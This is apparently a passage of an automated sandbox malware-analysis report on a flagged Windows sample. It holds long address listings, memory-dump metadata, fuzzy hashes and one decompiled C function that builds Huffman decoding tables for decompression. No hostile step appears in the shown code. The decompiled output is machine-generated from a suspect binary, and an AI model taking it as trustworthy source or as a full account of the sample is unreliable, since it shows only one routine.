                                                                                                                        0x00406e96
                                                                                                                        0x00406eaa
                                                                                                                        0x00406eaa
                                                                                                                        0x00407479
                                                                                                                        0x00407479
                                                                                                                        0x00407479
                                                                                                                        0x0040747e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ab6
                                                                                                                        0x00406ab6
                                                                                                                        0x00000000
                                                                                                                        0x004070b1
                                                                                                                        0x004070b1
                                                                                                                        0x004070b5
                                                                                                                        0x004070b8
                                                                                                                        0x004070bb
                                                                                                                        0x004070be
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070c4
                                                                                                                        0x004070c4
                                                                                                                        0x004070e9
                                                                                                                        0x004070e9
                                                                                                                        0x004070e9
                                                                                                                        0x004070eb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070c9
                                                                                                                        0x004070c9
                                                                                                                        0x004070cd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070d3
                                                                                                                        0x004070d3
                                                                                                                        0x004070d6
                                                                                                                        0x004070d9
                                                                                                                        0x004070dc
                                                                                                                        0x004070de
                                                                                                                        0x004070e0
                                                                                                                        0x004070e3
                                                                                                                        0x004070e6
                                                                                                                        0x004070e6
                                                                                                                        0x004070e6
                                                                                                                        0x004070ed
                                                                                                                        0x004070ed
                                                                                                                        0x004070f5
                                                                                                                        0x004070f8
                                                                                                                        0x004070fb
                                                                                                                        0x004070fe
                                                                                                                        0x00407102
                                                                                                                        0x00407105
                                                                                                                        0x00407107
                                                                                                                        0x0040710a
                                                                                                                        0x0040710c
                                                                                                                        0x00407120
                                                                                                                        0x00407120
                                                                                                                        0x00407123
                                                                                                                        0x0040713d
                                                                                                                        0x0040713d
                                                                                                                        0x00407140
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407146
                                                                                                                        0x00407146
                                                                                                                        0x00407149
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040714f
                                                                                                                        0x0040714f
                                                                                                                        0x00000000
                                                                                                                        0x0040714f
                                                                                                                        0x00407125
                                                                                                                        0x00407128
                                                                                                                        0x0040712f
                                                                                                                        0x00407132
                                                                                                                        0x00000000
                                                                                                                        0x00407132
                                                                                                                        0x0040710e
                                                                                                                        0x00407112
                                                                                                                        0x00407115
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040715a
                                                                                                                        0x0040715a
                                                                                                                        0x0040717f
                                                                                                                        0x0040717f
                                                                                                                        0x0040717f
                                                                                                                        0x00407181
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040715f
                                                                                                                        0x0040715f
                                                                                                                        0x00407163
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407169
                                                                                                                        0x00407169
                                                                                                                        0x0040716c
                                                                                                                        0x0040716f
                                                                                                                        0x00407172
                                                                                                                        0x00407174
                                                                                                                        0x00407176
                                                                                                                        0x00407179
                                                                                                                        0x0040717c
                                                                                                                        0x0040717c
                                                                                                                        0x0040717c
                                                                                                                        0x00407183
                                                                                                                        0x0040718b
                                                                                                                        0x0040718e
                                                                                                                        0x00407191
                                                                                                                        0x00407193
                                                                                                                        0x00407196
                                                                                                                        0x00407196
                                                                                                                        0x00407198
                                                                                                                        0x0040719c
                                                                                                                        0x0040719f
                                                                                                                        0x004071a2
                                                                                                                        0x004071a5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004071ab
                                                                                                                        0x004071ab
                                                                                                                        0x004071d0
                                                                                                                        0x004071d0
                                                                                                                        0x004071d0
                                                                                                                        0x004071d2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004071b0
                                                                                                                        0x004071b0
                                                                                                                        0x004071b4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004071ba
                                                                                                                        0x004071ba
                                                                                                                        0x004071bd
                                                                                                                        0x004071c0
                                                                                                                        0x004071c3
                                                                                                                        0x004071c5
                                                                                                                        0x004071c7
                                                                                                                        0x00406add
                                                                                                                        0x00406ac1
                                                                                                                        0x00000000
                                                                                                                        0x00406ac7
                                                                                                                        0x00406aca
                                                                                                                        0x00406ad4
                                                                                                                        0x00406ad7
                                                                                                                        0x00406ada
                                                                                                                        0x00000000
                                                                                                                        0x00406ada
                                                                                                                        0x00406ac1
                                                                                                                        0x00406ae5
                                                                                                                        0x00406ae8
                                                                                                                        0x00406aec
                                                                                                                        0x00406af6
                                                                                                                        0x00406b00
                                                                                                                        0x00406b03
                                                                                                                        0x00406b09
                                                                                                                        0x00406c3d
                                                                                                                        0x00406c3f
                                                                                                                        0x00406c45
                                                                                                                        0x00406c48
                                                                                                                        0x00406c4b
                                                                                                                        0x00000000
                                                                                                                        0x00406c4b
                                                                                                                        0x00406b0f
                                                                                                                        0x00406b0f
                                                                                                                        0x00406b10
                                                                                                                        0x00406b68
                                                                                                                        0x00406b68
                                                                                                                        0x00406b6f
                                                                                                                        0x00406c15
                                                                                                                        0x00406c15
                                                                                                                        0x00406c1a
                                                                                                                        0x00406c1d
                                                                                                                        0x00406c22
                                                                                                                        0x00406c25
                                                                                                                        0x00406c2a
                                                                                                                        0x00406c2d
                                                                                                                        0x00406c32
                                                                                                                        0x00406c35
                                                                                                                        0x00406c35
                                                                                                                        0x00000000
                                                                                                                        0x00406b75
                                                                                                                        0x00406b75
                                                                                                                        0x00406b75
                                                                                                                        0x00406b75
                                                                                                                        0x00406b79
                                                                                                                        0x00406b79
                                                                                                                        0x00406b9b
                                                                                                                        0x00406b9e
                                                                                                                        0x00406ba0
                                                                                                                        0x00406ba3
                                                                                                                        0x00406ba8
                                                                                                                        0x00406b7e
                                                                                                                        0x00406b7e
                                                                                                                        0x00406b83
                                                                                                                        0x00406b85
                                                                                                                        0x00406b87
                                                                                                                        0x00406b8c
                                                                                                                        0x00406b92
                                                                                                                        0x00406b97
                                                                                                                        0x00406b99
                                                                                                                        0x00406b99
                                                                                                                        0x00406b8e
                                                                                                                        0x00406b8e
                                                                                                                        0x00406b8e
                                                                                                                        0x00406b8c
                                                                                                                        0x00000000
                                                                                                                        0x00406baa
                                                                                                                        0x00406bd7
                                                                                                                        0x00406bdc
                                                                                                                        0x00406bde
                                                                                                                        0x00406bdf
                                                                                                                        0x00406be1
                                                                                                                        0x00406be2
                                                                                                                        0x00406be2
                                                                                                                        0x00406be2
                                                                                                                        0x00406c0a
                                                                                                                        0x00406c0f
                                                                                                                        0x00406c0f
                                                                                                                        0x00000000
                                                                                                                        0x00406c0f
                                                                                                                        0x00406ba8
                                                                                                                        0x00406b6f
                                                                                                                        0x00406b12
                                                                                                                        0x00406b12
                                                                                                                        0x00406b13
                                                                                                                        0x00406b5d
                                                                                                                        0x00000000
                                                                                                                        0x00406b5d
                                                                                                                        0x00406b15
                                                                                                                        0x00406b16
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c72
                                                                                                                        0x00406c72
                                                                                                                        0x00406c72
                                                                                                                        0x00406c75
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c52
                                                                                                                        0x00406c52
                                                                                                                        0x00406c56
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c5c
                                                                                                                        0x00406c5c
                                                                                                                        0x00406c5f
                                                                                                                        0x00406c62
                                                                                                                        0x00406c67
                                                                                                                        0x00406c69
                                                                                                                        0x00406c6c
                                                                                                                        0x00406c6f
                                                                                                                        0x00406c6f
                                                                                                                        0x00406c6f
                                                                                                                        0x00406c77
                                                                                                                        0x00406c77
                                                                                                                        0x00406c7a
                                                                                                                        0x00406c7c
                                                                                                                        0x00406c81
                                                                                                                        0x00406c84
                                                                                                                        0x00406c86
                                                                                                                        0x00406c89
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c8f
                                                                                                                        0x00406c8f
                                                                                                                        0x00406c91
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c97
                                                                                                                        0x00406c97
                                                                                                                        0x00406c9b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ca1
                                                                                                                        0x00406ca1
                                                                                                                        0x00406ca4
                                                                                                                        0x00406ca6
                                                                                                                        0x00406d44
                                                                                                                        0x00406d44
                                                                                                                        0x00406d47
                                                                                                                        0x00406d49
                                                                                                                        0x00406d49
                                                                                                                        0x00406d4c
                                                                                                                        0x00406d4f
                                                                                                                        0x00406d51
                                                                                                                        0x00406d53
                                                                                                                        0x00406d55
                                                                                                                        0x00406d55
                                                                                                                        0x00406d5e
                                                                                                                        0x00406d63
                                                                                                                        0x00406d66
                                                                                                                        0x00406d69
                                                                                                                        0x00406d6c
                                                                                                                        0x00406d6f
                                                                                                                        0x00406d6f
                                                                                                                        0x00406d6f
                                                                                                                        0x00406d72
                                                                                                                        0x00406d78
                                                                                                                        0x00406d78
                                                                                                                        0x00406d7e
                                                                                                                        0x00406d7e
                                                                                                                        0x00406d7e
                                                                                                                        0x00000000
                                                                                                                        0x00406d72
                                                                                                                        0x00406cac
                                                                                                                        0x00406cac
                                                                                                                        0x00406cb2
                                                                                                                        0x00406cb5
                                                                                                                        0x00406cb7
                                                                                                                        0x00406ce2
                                                                                                                        0x00406ce5
                                                                                                                        0x00406ceb
                                                                                                                        0x00406cf0
                                                                                                                        0x00406cf6
                                                                                                                        0x00406cfc
                                                                                                                        0x00406cfe
                                                                                                                        0x00406d01
                                                                                                                        0x00406d0a
                                                                                                                        0x00406d10
                                                                                                                        0x00406d10
                                                                                                                        0x00406d03
                                                                                                                        0x00406d05
                                                                                                                        0x00406d07
                                                                                                                        0x00406d07
                                                                                                                        0x00406d12
                                                                                                                        0x00406d18
                                                                                                                        0x00406d1b
                                                                                                                        0x00406d1d
                                                                                                                        0x00406d1f
                                                                                                                        0x00406d25
                                                                                                                        0x00406d27
                                                                                                                        0x00406d29
                                                                                                                        0x00406d2c
                                                                                                                        0x00406d35
                                                                                                                        0x00406d35
                                                                                                                        0x00406d37
                                                                                                                        0x00406d2e
                                                                                                                        0x00406d2e
                                                                                                                        0x00406d31
                                                                                                                        0x00406d31
                                                                                                                        0x00406d39
                                                                                                                        0x00406d39
                                                                                                                        0x00406d27
                                                                                                                        0x00406d3c
                                                                                                                        0x00406d3e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e9a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e9c
                                                                                                                        0x00406e9c
                                                                                                                        0x00406e9f
                                                                                                                        0x00000000
                                                                                                                        0x00406e9f
                                                                                                                        0x00406de4
                                                                                                                        0x00406da5
                                                                                                                        0x00407489
                                                                                                                        0x0040748c
                                                                                                                        0x0040748e
                                                                                                                        0x00407497
                                                                                                                        0x0040749d
                                                                                                                        0x00000000

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                        • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                                                        • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                        • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                                                        				signed int _v8;
                                                                                                                        				unsigned int _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				intOrPtr _v20;
                                                                                                                        				signed int _v24;
                                                                                                                        				signed int _v28;
                                                                                                                        				intOrPtr* _v32;
                                                                                                                        				signed int* _v36;
                                                                                                                        				signed int _v40;
                                                                                                                        				signed int _v44;
                                                                                                                        				intOrPtr _v48;
                                                                                                                        				intOrPtr _v52;
                                                                                                                        				void _v116;
                                                                                                                        				signed int _v176;
                                                                                                                        				signed int _v180;
                                                                                                                        				signed int _v240;
                                                                                                                        				signed int _t166;
                                                                                                                        				signed int _t168;
                                                                                                                        				intOrPtr _t175;
                                                                                                                        				signed int _t181;
                                                                                                                        				void* _t182;
                                                                                                                        				intOrPtr _t183;
                                                                                                                        				signed int* _t184;
                                                                                                                        				signed int _t186;
                                                                                                                        				signed int _t187;
                                                                                                                        				signed int* _t189;
                                                                                                                        				signed int _t190;
                                                                                                                        				intOrPtr* _t191;
                                                                                                                        				intOrPtr _t192;
                                                                                                                        				signed int _t193;
                                                                                                                        				signed int _t195;
                                                                                                                        				signed int _t200;
                                                                                                                        				signed int _t205;
                                                                                                                        				void* _t207;
                                                                                                                        				short _t208;
                                                                                                                        				signed char _t222;
                                                                                                                        				signed int _t224;
                                                                                                                        				signed int _t225;
                                                                                                                        				signed int* _t232;
                                                                                                                        				signed int _t233;
                                                                                                                        				signed int _t234;
                                                                                                                        				void* _t235;
                                                                                                                        				signed int _t236;
                                                                                                                        				signed int _t244;
                                                                                                                        				signed int _t246;
                                                                                                                        				signed int _t251;
                                                                                                                        				signed int _t254;
                                                                                                                        				signed int _t256;
                                                                                                                        				signed int _t259;
                                                                                                                        				signed int _t262;
                                                                                                                        				void* _t263;
                                                                                                                        				void* _t264;
                                                                                                                        				signed int _t267;
                                                                                                                        				intOrPtr _t269;
                                                                                                                        				intOrPtr _t271;
                                                                                                                        				signed int _t274;
                                                                                                                        				intOrPtr* _t275;
                                                                                                                        				unsigned int _t276;
                                                                                                                        				void* _t277;
                                                                                                                        				signed int _t278;
                                                                                                                        				intOrPtr* _t279;
                                                                                                                        				signed int _t281;
                                                                                                                        				intOrPtr _t282;
                                                                                                                        				intOrPtr _t283;
                                                                                                                        				signed int* _t284;
                                                                                                                        				signed int _t286;
                                                                                                                        				signed int _t287;
                                                                                                                        				signed int _t288;
                                                                                                                        				signed int _t296;
                                                                                                                        				signed int* _t297;
                                                                                                                        				intOrPtr _t298;
                                                                                                                        				void* _t299;
                                                                                                                        
                                                                                                                        				_t278 = _a8;
                                                                                                                        				_t187 = 0x10;
                                                                                                                        				memset( &_v116, 0, _t187 << 2);
                                                                                                                        				_t189 = _a4;
                                                                                                                        				_t233 = _t278;
                                                                                                                        				do {
                                                                                                                        					_t166 =  *_t189;
                                                                                                                        					_t189 =  &(_t189[1]);
                                                                                                                        					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                                                        					_t233 = _t233 - 1;
                                                                                                                        				} while (_t233 != 0);
                                                                                                                        				if(_v116 != _t278) {
                                                                                                                        					_t279 = _a28;
                                                                                                                        					_t267 =  *_t279;
                                                                                                                        					_t190 = 1;
                                                                                                                        					_a28 = _t267;
                                                                                                                        					_t234 = 0xf;
                                                                                                                        					while(1) {
                                                                                                                        						_t168 = 0;
                                                                                                                        						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						_t190 = _t190 + 1;
                                                                                                                        						if(_t190 <= _t234) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_v8 = _t190;
                                                                                                                        					if(_t267 < _t190) {
                                                                                                                        						_a28 = _t190;
                                                                                                                        					}
                                                                                                                        					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                                                        						_t234 = _t234 - 1;
                                                                                                                        						if(_t234 != 0) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_v28 = _t234;
                                                                                                                        					if(_a28 > _t234) {
                                                                                                                        						_a28 = _t234;
                                                                                                                        					}
                                                                                                                        					 *_t279 = _a28;
                                                                                                                        					_t181 = 1 << _t190;
                                                                                                                        					while(_t190 < _t234) {
                                                                                                                        						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                                                        						if(_t182 < 0) {
                                                                                                                        							L64:
                                                                                                                        							return _t168 | 0xffffffff;
                                                                                                                        						}
                                                                                                                        						_t190 = _t190 + 1;
                                                                                                                        						_t181 = _t182 + _t182;
                                                                                                                        					}
                                                                                                                        					_t281 = _t234 << 2;
                                                                                                                        					_t191 = _t299 + _t281 - 0x70;
                                                                                                                        					_t269 =  *_t191;
                                                                                                                        					_t183 = _t181 - _t269;
                                                                                                                        					_v52 = _t183;
                                                                                                                        					if(_t183 < 0) {
                                                                                                                        						goto L64;
                                                                                                                        					}
                                                                                                                        					_v176 = _t168;
                                                                                                                        					 *_t191 = _t269 + _t183;
                                                                                                                        					_t192 = 0;
                                                                                                                        					_t235 = _t234 - 1;
                                                                                                                        					if(_t235 == 0) {
                                                                                                                        						L21:
                                                                                                                        						_t184 = _a4;
                                                                                                                        						_t271 = 0;
                                                                                                                        						do {
                                                                                                                        							_t193 =  *_t184;
                                                                                                                        							_t184 =  &(_t184[1]);
                                                                                                                        							if(_t193 != _t168) {
                                                                                                                        								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                                                        								_t236 =  *_t232;
                                                                                                                        								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                                                                                        								 *_t232 = _t236 + 1;
                                                                                                                        							}
                                                                                                                        							_t271 = _t271 + 1;
                                                                                                                        						} while (_t271 < _a8);
                                                                                                                        						_v16 = _v16 | 0xffffffff;
                                                                                                                        						_v40 = _v40 & 0x00000000;
                                                                                                                        						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                                                        						_t195 = _v8;
                                                                                                                        						_t186 =  ~_a28;
                                                                                                                        						_v12 = _t168;
                                                                                                                        						_v180 = _t168;
                                                                                                                        						_v36 = 0x432190;
                                                                                                                        						_v240 = _t168;
                                                                                                                        						if(_t195 > _v28) {
                                                                                                                        							L62:
                                                                                                                        							_t168 = 0;
                                                                                                                        							if(_v52 == 0 || _v28 == 1) {
                                                                                                                        								return _t168;
                                                                                                                        							} else {
                                                                                                                        								goto L64;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_v44 = _t195 - 1;
                                                                                                                        						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                                                        						do {
                                                                                                                        							_t282 =  *_v32;
                                                                                                                        							if(_t282 == 0) {
                                                                                                                        								goto L61;
                                                                                                                        							}
                                                                                                                        							while(1) {
                                                                                                                        								_t283 = _t282 - 1;
                                                                                                                        								_t200 = _a28 + _t186;
                                                                                                                        								_v48 = _t283;
                                                                                                                        								_v24 = _t200;
                                                                                                                        								if(_v8 <= _t200) {
                                                                                                                        									goto L45;
                                                                                                                        								}
                                                                                                                        								L31:
                                                                                                                        								_v20 = _t283 + 1;
                                                                                                                        								do {
                                                                                                                        									_v16 = _v16 + 1;
                                                                                                                        									_t296 = _v28 - _v24;
                                                                                                                        									if(_t296 > _a28) {
                                                                                                                        										_t296 = _a28;
                                                                                                                        									}
                                                                                                                        									_t222 = _v8 - _v24;
                                                                                                                        									_t254 = 1 << _t222;
                                                                                                                        									if(1 <= _v20) {
                                                                                                                        										L40:
                                                                                                                        										_t256 =  *_a36;
                                                                                                                        										_t168 = 1 << _t222;
                                                                                                                        										_v40 = 1;
                                                                                                                        										_t274 = _t256 + 1;
                                                                                                                        										if(_t274 > 0x5a0) {
                                                                                                                        											goto L64;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										_t275 = _v32;
                                                                                                                        										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                                                        										if(_t222 >= _t296) {
                                                                                                                        											goto L40;
                                                                                                                        										}
                                                                                                                        										while(1) {
                                                                                                                        											_t222 = _t222 + 1;
                                                                                                                        											if(_t222 >= _t296) {
                                                                                                                        												goto L40;
                                                                                                                        											}
                                                                                                                        											_t275 = _t275 + 4;
                                                                                                                        											_t264 = _t263 + _t263;
                                                                                                                        											_t175 =  *_t275;
                                                                                                                        											if(_t264 <= _t175) {
                                                                                                                        												goto L40;
                                                                                                                        											}
                                                                                                                        											_t263 = _t264 - _t175;
                                                                                                                        										}
                                                                                                                        										goto L40;
                                                                                                                        									}
                                                                                                                        									_t168 = _a32 + _t256 * 4;
                                                                                                                        									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                                                        									 *_a36 = _t274;
                                                                                                                        									_t259 = _v16;
                                                                                                                        									 *_t297 = _t168;
                                                                                                                        									if(_t259 == 0) {
                                                                                                                        										 *_a24 = _t168;
                                                                                                                        									} else {
                                                                                                                        										_t276 = _v12;
                                                                                                                        										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                                                        										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                                                        										_a5 = _a28;
                                                                                                                        										_a4 = _t222;
                                                                                                                        										_t262 = _t276 >> _t186;
                                                                                                                        										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                                                        										 *(_t298 + _t262 * 4) = _a4;
                                                                                                                        									}
                                                                                                                        									_t224 = _v24;
                                                                                                                        									_t186 = _t224;
                                                                                                                        									_t225 = _t224 + _a28;
                                                                                                                        									_v24 = _t225;
                                                                                                                        								} while (_v8 > _t225);
                                                                                                                        								L45:
                                                                                                                        								_t284 = _v36;
                                                                                                                        								_a5 = _v8 - _t186;
                                                                                                                        								if(_t284 < 0x432190 + _a8 * 4) {
                                                                                                                        									_t205 =  *_t284;
                                                                                                                        									if(_t205 >= _a12) {
                                                                                                                        										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                                                        										_v36 =  &(_v36[1]);
                                                                                                                        										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                                                        										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                                                        									} else {
                                                                                                                        										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                                                        										_t208 =  *_t284;
                                                                                                                        										_v36 =  &(_t284[1]);
                                                                                                                        									}
                                                                                                                        									_a6 = _t208;
                                                                                                                        								} else {
                                                                                                                        									_a4 = 0xc0;
                                                                                                                        								}
                                                                                                                        								_t286 = 1 << _v8 - _t186;
                                                                                                                        								_t244 = _v12 >> _t186;
                                                                                                                        								while(_t244 < _v40) {
                                                                                                                        									 *(_t168 + _t244 * 4) = _a4;
                                                                                                                        									_t244 = _t244 + _t286;
                                                                                                                        								}
                                                                                                                        								_t287 = _v12;
                                                                                                                        								_t246 = 1 << _v44;
                                                                                                                        								while((_t287 & _t246) != 0) {
                                                                                                                        									_t287 = _t287 ^ _t246;
                                                                                                                        									_t246 = _t246 >> 1;
                                                                                                                        								}
                                                                                                                        								_t288 = _t287 ^ _t246;
                                                                                                                        								_v20 = 1;
                                                                                                                        								_v12 = _t288;
                                                                                                                        								_t251 = _v16;
                                                                                                                        								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                                                        									L60:
                                                                                                                        									if(_v48 != 0) {
                                                                                                                        										_t282 = _v48;
                                                                                                                        										_t283 = _t282 - 1;
                                                                                                                        										_t200 = _a28 + _t186;
                                                                                                                        										_v48 = _t283;
                                                                                                                        										_v24 = _t200;
                                                                                                                        										if(_v8 <= _t200) {
                                                                                                                        											goto L45;
                                                                                                                        										}
                                                                                                                        										goto L31;
                                                                                                                        									}
                                                                                                                        									break;
                                                                                                                        								} else {
                                                                                                                        									goto L58;
                                                                                                                        								}
                                                                                                                        								do {
                                                                                                                        									L58:
                                                                                                                        									_t186 = _t186 - _a28;
                                                                                                                        									_t251 = _t251 - 1;
                                                                                                                        								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                                                        								_v16 = _t251;
                                                                                                                        								goto L60;
                                                                                                                        							}
                                                                                                                        							L61:
                                                                                                                        							_v8 = _v8 + 1;
                                                                                                                        							_v32 = _v32 + 4;
                                                                                                                        							_v44 = _v44 + 1;
                                                                                                                        						} while (_v8 <= _v28);
                                                                                                                        						goto L62;
                                                                                                                        					}
                                                                                                                        					_t277 = 0;
                                                                                                                        					do {
                                                                                                                        						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                                                        						_t277 = _t277 + 4;
                                                                                                                        						_t235 = _t235 - 1;
                                                                                                                        						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                                                        					} while (_t235 != 0);
                                                                                                                        					goto L21;
                                                                                                                        				}
                                                                                                                        				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                        				 *_a28 =  *_a28 & 0x00000000;
                                                                                                                        				return 0;
                                                                                                                        			}
                                                                                                                        0x0040764c
                                                                                                                        0x0040764e
                                                                                                                        0x0040764f
                                                                                                                        0x0040765e
                                                                                                                        0x00407662
                                                                                                                        0x00407666
                                                                                                                        0x00407669
                                                                                                                        0x0040766c
                                                                                                                        0x00407671
                                                                                                                        0x00407674
                                                                                                                        0x0040767a
                                                                                                                        0x00407681
                                                                                                                        0x00407687
                                                                                                                        0x00407880
                                                                                                                        0x00407880
                                                                                                                        0x00407885
                                                                                                                        0x00407894
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407885
                                                                                                                        0x00407694
                                                                                                                        0x00407697
                                                                                                                        0x0040769a
                                                                                                                        0x0040769d
                                                                                                                        0x004076a1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004076ac
                                                                                                                        0x004076af
                                                                                                                        0x004076b0
                                                                                                                        0x004076b2
                                                                                                                        0x004076b8
                                                                                                                        0x004076bb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004076c1
                                                                                                                        0x004076c2
                                                                                                                        0x004076c5
                                                                                                                        0x004076c8
                                                                                                                        0x004076cb
                                                                                                                        0x004076d1
                                                                                                                        0x004076d3
                                                                                                                        0x004076d3
                                                                                                                        0x004076db
                                                                                                                        0x004076df
                                                                                                                        0x004076e4
                                                                                                                        0x00407709
                                                                                                                        0x0040770f
                                                                                                                        0x00407711
                                                                                                                        0x00407713
                                                                                                                        0x00407716
                                                                                                                        0x0040771f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004076e6
                                                                                                                        0x004076e6
                                                                                                                        0x004076ef
                                                                                                                        0x004076f3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407704
                                                                                                                        0x00407704
                                                                                                                        0x00407707
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004076f7
                                                                                                                        0x004076fa
                                                                                                                        0x004076fc
                                                                                                                        0x00407700
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407702
                                                                                                                        0x00407702
                                                                                                                        0x00000000
                                                                                                                        0x00407704
                                                                                                                        0x00407728
                                                                                                                        0x0040772e
                                                                                                                        0x00407738
                                                                                                                        0x0040773a
                                                                                                                        0x0040773f
                                                                                                                        0x00407741
                                                                                                                        0x00407777
                                                                                                                        0x00407743
                                                                                                                        0x00407743
                                                                                                                        0x00407746
                                                                                                                        0x00407749
                                                                                                                        0x00407753
                                                                                                                        0x00407756
                                                                                                                        0x0040775d
                                                                                                                        0x00407768
                                                                                                                        0x0040776f
                                                                                                                        0x0040776f
                                                                                                                        0x00407779
                                                                                                                        0x0040777c
                                                                                                                        0x0040777e
                                                                                                                        0x00407784
                                                                                                                        0x00407784
                                                                                                                        0x0040778d
                                                                                                                        0x00407790
                                                                                                                        0x00407795
                                                                                                                        0x004077a4
                                                                                                                        0x004077ac
                                                                                                                        0x004077b1
                                                                                                                        0x004077d5
                                                                                                                        0x004077dd
                                                                                                                        0x004077e1
                                                                                                                        0x004077e7
                                                                                                                        0x004077b3
                                                                                                                        0x004077c1
                                                                                                                        0x004077c4
                                                                                                                        0x004077ca
                                                                                                                        0x004077ca
                                                                                                                        0x004077eb
                                                                                                                        0x004077a6
                                                                                                                        0x004077a6
                                                                                                                        0x004077a6
                                                                                                                        0x004077fc
                                                                                                                        0x00407800
                                                                                                                        0x0040780c
                                                                                                                        0x00407807
